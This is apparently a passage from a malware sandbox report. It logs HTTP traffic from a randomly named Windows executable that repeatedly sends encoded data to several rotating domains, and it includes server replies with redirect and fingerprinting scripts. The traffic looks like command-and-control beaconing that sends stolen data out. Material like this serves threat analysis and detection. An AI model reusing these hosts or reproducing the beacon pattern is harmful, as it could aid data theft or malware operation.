User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n= [TRUNCATED]
Timestamp: Jan 11, 2025 03:25:11.603065968 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:25:11 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 8 | Source IP: 192.168.2.10 | Source Port: 51535 | Destination IP: 209.74.77.109 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe

Timestamp: Jan 11, 2025 03:25:13.425457954 CET | Bytes transferred: 489 | Direction: OUT | Data: GET /r3zg/?P8dT=Gvw8Prk0H4&6n=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06bVBzroOuQGNKcNgifQ36nJgHTvH4A== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.greenthub.life
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Timestamp: Jan 11, 2025 03:25:14.002950907 CET | Bytes transferred: 548 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:25:13 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 9 | Source IP: 192.168.2.10 | Source Port: 51536 | Destination IP: 23.225.159.42 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe

Timestamp: Jan 11, 2025 03:25:19.547841072 CET | Bytes transferred: 747 | Direction: OUT | Data: POST /n2c9/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 191
Connection: close
Host: www.laohub10.net
Origin: http://www.laohub10.net
Referer: http://www.laohub10.net/n2c9/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=6zXbcNT7Su38XueXmjPsZmsmxKs+GxcTc5shML+/WmIaIkMwwKhg7UjEYSHe7CbsEV0xlCUloR3LAbTbOCt/Lu0RInt8BsYlkYosjCzMytMyFN3h6SXDcqLT8IhND1uuoyHGxrTb/FFZJc7Ounl9XNH5MLDIx9g87Vx+q6xTq1Nf4QF8qTuLbKa2fn53
Timestamp: Jan 11, 2025 03:25:20.065481901 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
Cache-Control: max-age=86400
Age: 1
Connection: Close
Content-Length: 358
Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID: 10 | Source IP: 192.168.2.10 | Source Port: 51537 | Destination IP: 23.225.159.42 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe

Timestamp: Jan 11, 2025 03:25:22.090956926 CET | Bytes transferred: 771 | Direction: OUT | Data: POST /n2c9/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Host: www.laohub10.net
Origin: http://www.laohub10.net
Referer: http://www.laohub10.net/n2c9/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXU8aJGUwxIJg4UjEQyHb1ib3EVoTlH8loRjLAajbJ158L+0TOnt+OMYlkYosjCWrytEyFdnh4zXCHKLUsYhNH1uqoyHkxqfh/ABZJZXOu2l6ZNH/RbCZ3P1j5AYZnIVmqkxUyR477CPcI9G4RhMd8Fj1ECzUnrX21sdaXer/gw==
Timestamp: Jan 11, 2025 03:25:22.614605904 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
Cache-Control: max-age=86400
Age: 1
Connection: Close
Content-Length: 358
Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID: 11 | Source IP: 192.168.2.10 | Source Port: 51538 | Destination IP: 23.225.159.42 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe

Timestamp: Jan 11, 2025 03:25:24.641237974 CET | Bytes transferred: 1784 | Direction: OUT | Data: POST /n2c9/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1227
Connection: close
Host: www.laohub10.net
Origin: http://www.laohub10.net
Referer: http://www.laohub10.net/n2c9/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n= [TRUNCATED]
Timestamp: Jan 11, 2025 03:25:25.147773981 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
Cache-Control: max-age=86400
Age: 1
Connection: Close
Content-Length: 358
Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID: 12 | Source IP: 192.168.2.10 | Source Port: 51539 | Destination IP: 23.225.159.42 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe

Timestamp: Jan 11, 2025 03:25:27.201853037 CET | Bytes transferred: 487 | Direction: OUT | Data: GET /n2c9/?6n=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvFKcHVyRNQ0lpxItwqxseE7Zdzalg==&P8dT=Gvw8Prk0H4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.laohub10.net
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Timestamp: Jan 11, 2025 03:25:27.718453884 CET | Bytes transferred: 533 | Direction: IN | Data: HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
Cache-Control: max-age=86400
Age: 1
Connection: Close
Content-Length: 358
Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID: 13 | Source IP: 192.168.2.10 | Source Port: 51540 | Destination IP: 46.30.211.38 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp: Jan 11, 2025 03:25:32.926224947 CET | Bytes transferred: 753 | Direction: OUT
POST /uf7y/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 191
Connection: close
Host: www.bankseedz.info
Origin: http://www.bankseedz.info
Referer: http://www.bankseedz.info/uf7y/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Ascii: 6n=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65oqGNcRSTYCShZoxbxxFQL5DUcIb0Z
Timestamp: Jan 11, 2025 03:25:33.524447918 CET | Bytes transferred: 738 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 Jan 2025 02:25:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 564
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html> followed by the comment line <!-- a padding to disable MSIE and Chrome friendly error page --> repeated six times


Session ID: 14 | Source IP: 192.168.2.10 | Source Port: 51541 | Destination IP: 46.30.211.38 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp: Jan 11, 2025 03:25:35.567595005 CET | Bytes transferred: 777 | Direction: OUT
POST /uf7y/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Host: www.bankseedz.info
Origin: http://www.bankseedz.info
Referer: http://www.bankseedz.info/uf7y/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Ascii: 6n=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0ISGdBzL2l7wFkfZbEBi5/LU7a+6A==
Timestamp: Jan 11, 2025 03:25:36.119391918 CET | Bytes transferred: 738 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 Jan 2025 02:25:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 564
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html> followed by the comment line <!-- a padding to disable MSIE and Chrome friendly error page --> repeated six times


Session ID: 15 | Source IP: 192.168.2.10 | Source Port: 51542 | Destination IP: 46.30.211.38 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp: Jan 11, 2025 03:25:38.133070946 CET | Bytes transferred: 1790 | Direction: OUT
POST /uf7y/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1227
Connection: close
Host: www.bankseedz.info
Origin: http://www.bankseedz.info
Referer: http://www.bankseedz.info/uf7y/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Timestamp: Jan 11, 2025 03:25:38.736265898 CET | Bytes transferred: 738 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 Jan 2025 02:25:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 564
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html> followed by the comment line <!-- a padding to disable MSIE and Chrome friendly error page --> repeated six times


Session ID: 16 | Source IP: 192.168.2.10 | Source Port: 51543 | Destination IP: 46.30.211.38 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp: Jan 11, 2025 03:25:40.667407990 CET | Bytes transferred: 489 | Direction: OUT
GET /uf7y/?P8dT=Gvw8Prk0H4&6n=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7goc5xtOfckJoEDkF4EtN7gOpTNuRUA== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.bankseedz.info
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Timestamp: Jan 11, 2025 03:25:41.277942896 CET | Bytes transferred: 738 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 11 Jan 2025 02:25:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 564
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html> followed by the comment line <!-- a padding to disable MSIE and Chrome friendly error page --> repeated six times


Session ID: 17 | Source IP: 192.168.2.10 | Source Port: 51544 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp: Jan 11, 2025 03:25:46.897744894 CET | Bytes transferred: 741 | Direction: OUT
POST /3iym/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 191
Connection: close
Host: www.madhf.tech
Origin: http://www.madhf.tech
Referer: http://www.madhf.tech/3iym/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Ascii: 6n=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RtkRd98sED1bAnbZu3Y1C+ytWWBC5
Timestamp: Jan 11, 2025 03:25:47.517066956 CET | Bytes transferred: 871 | Direction: IN
HTTP/1.1 200 OK
date: Sat, 11 Jan 2025 02:25:47 GMT
server: Apache
set-cookie: __tad=1736562347.1667970; expires=Tue, 09-Jan-2035 02:25:47 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 576
content-type: text/html; charset=UTF-8
connection: close


Session ID: 18 | Source IP: 192.168.2.10 | Source Port: 51545 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 6148 | Process: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp: Jan 11, 2025 03:25:49.441230059 CET | Bytes transferred: 765 | Direction: OUT
POST /3iym/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Host: www.madhf.tech
Origin: http://www.madhf.tech
Referer: http://www.madhf.tech/3iym/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Ascii: 6n=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFxYYH3TZP87oiTm4rE/zwyJ3WrFqQ==
                                                                                                              Jan 11, 2025 03:25:50.025049925 CET  871                IN         HTTP/1.1 200 OK
                                                                                                              date: Sat, 11 Jan 2025 02:25:49 GMT
                                                                                                              server: Apache
                                                                                                              set-cookie: __tad=1736562349.4895586; expires=Tue, 09-Jan-2035 02:25:49 GMT; Max-Age=315360000
                                                                                                              vary: Accept-Encoding
                                                                                                              content-encoding: gzip
                                                                                                              content-length: 576
                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                              connection: close


                                                                                                              Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                              19          192.168.2.10  51546        103.224.182.242  80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                              Jan 11, 2025 03:25:51.983819962 CET  1778               OUT        POST /3iym/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.madhf.tech
                                                                                                              Origin: http://www.madhf.tech
                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:25:52.613168955 CET  871                IN         HTTP/1.1 200 OK
                                                                                                              date: Sat, 11 Jan 2025 02:25:52 GMT
                                                                                                              server: Apache
                                                                                                              set-cookie: __tad=1736562352.5933549; expires=Tue, 09-Jan-2035 02:25:52 GMT; Max-Age=315360000
                                                                                                              vary: Accept-Encoding
                                                                                                              content-encoding: gzip
                                                                                                              content-length: 576
                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                              connection: close


                                                                                                              Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                              20          192.168.2.10  51547        103.224.182.242  80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                              Jan 11, 2025 03:25:54.530111074 CET  485                OUT        GET /3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.madhf.tech
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:25:55.127856016 CET  1236               IN         HTTP/1.1 200 OK
                                                                                                              date: Sat, 11 Jan 2025 02:25:55 GMT
                                                                                                              server: Apache
                                                                                                              set-cookie: __tad=1736562355.1631554; expires=Tue, 09-Jan-2035 02:25:55 GMT; Max-Age=315360000
                                                                                                              vary: Accept-Encoding
                                                                                                              content-length: 1460
                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                              connection: close
                                                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#00
                                                                                                              Jan 11, 2025 03:25:55.127880096 CET  496                IN         Data Ascii: 0000"><div style='display: none;'><a href='http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4&fp=-3'>Click here to enter</a></div


                                                                                                              Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                              21          192.168.2.10  51548        149.88.81.190    80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                              Jan 11, 2025 03:26:00.890451908 CET  741                OUT        POST /hkgx/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.xcvbj.asia
                                                                                                              Origin: http://www.xcvbj.asia
                                                                                                              Referer: http://www.xcvbj.asia/hkgx/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Ascii: 6n=9i9IKJ/Yinkpdc3/0rRj5DlfDUOFrnOmKMaE28B/DjC8GrQiWlJtFpeVikDHSgmAmcujMIg2khNEggYD1jVcoQ8tks71ctl7LiFirDjxnE9QEMSFRFT6Yd1dPUsM5FUmQvhCtGVrJZrNTlKSjFJKBNTFf79np5Nm+Ob5nDoNdZf+3VFClBC7Y4wdoATD


                                                                                                              Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                              22          192.168.2.10  51549        149.88.81.190    80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                              Jan 11, 2025 03:26:03.441360950 CET  765                OUT        POST /hkgx/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.xcvbj.asia
                                                                                                              Origin: http://www.xcvbj.asia
                                                                                                              Referer: http://www.xcvbj.asia/hkgx/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Ascii: 6n=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRW8GPAiXgltLJeVoEDCPwmbmcjcMKE2khZEghID1w9foA8v8c7zYtl7LiFirHKWnCVQF4WFQkT9R91eZEsMylUqQvgntHYOJcvNTnCSiQ9VKNTfb78Tqodq577inDE8Cr7e5U4F0QjsLPsTmGmprFe+9fLjJaVPysVp2UPzrQ==


                                                                                                              Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                              23          192.168.2.10  51550        149.88.81.190    80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                              Jan 11, 2025 03:26:05.991118908 CET  1778               OUT        POST /hkgx/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.xcvbj.asia
                                                                                                              Origin: http://www.xcvbj.asia
                                                                                                              Referer: http://www.xcvbj.asia/hkgx/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


                                                                                                              Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                              24          192.168.2.10  51551        149.88.81.190    80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Timestamp                            Bytes transferred  Direction  Data
